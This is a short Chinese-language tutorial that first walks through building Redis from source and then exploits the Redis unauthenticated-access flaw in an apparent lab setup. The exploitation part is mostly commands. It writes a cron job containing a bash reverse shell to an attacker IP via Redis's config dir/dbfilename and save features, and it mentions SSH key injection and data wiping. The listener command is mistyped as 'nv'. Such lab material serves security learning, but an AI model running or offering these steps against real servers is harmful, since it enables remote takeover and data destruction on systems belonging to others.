redis环境搭建
1.首先将我们所用到的文件上传到服务器并解压
2.进入redis文件夹 使用 make 命令编译 如果报错gcc未找到就使用yum命令安装一下gcc: yum -y install gcc
3.进入redis下的src文件夹 有redis.server证明安装成功 使./redis.service
启动redis
4.链接redis话再打开一个终端进入redis下src目录使用./redis.cli就可以进行链接
5.为了方便使用可以将redis-cli复制到/usr/local/bin目录下,这样就可以在任意位置使用redis-cli来连接
redis未授权访问漏洞
Redis因配置不当可以未授权访问。攻击者无需认证访问到内部数据可导致敏感信息泄露,也可以恶意执行flushall来清空所以数据。攻击者可通过eval执行LUA代码,或通过数据备份功能往磁盘写入后门文件如果redis以root身份运行可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。
1.当服务器安装完redis后没有设置密码这时候就存在redis未授权漏洞
我们可以使用另一台有reids服务器进行连接
示例:我们centos服务器是搭建了redis并且没设置密码,然后我们使用安装了redis服务的kali服务器进行连接
redis-cli -h 192.168.1.19 -p 6379
redis未授权漏洞利用
写入计划任务反弹shell
set x "\n* * * * * /bin/bash -i > /dev/tcp/192.168.1.9/6666 0<&1 2>&1\n"
以上命令就是写入计划任务反弹shell,ip设置为攻击机的ip 端口自定,每分钟执行一次。config set dir /var/spool/cron/
设置路径
config set dbfilename root 设置以root身份执行
save 保存
以上完成后在攻击机开启一个监听 拿到权限可以控制服务器。
nv -lvp 6666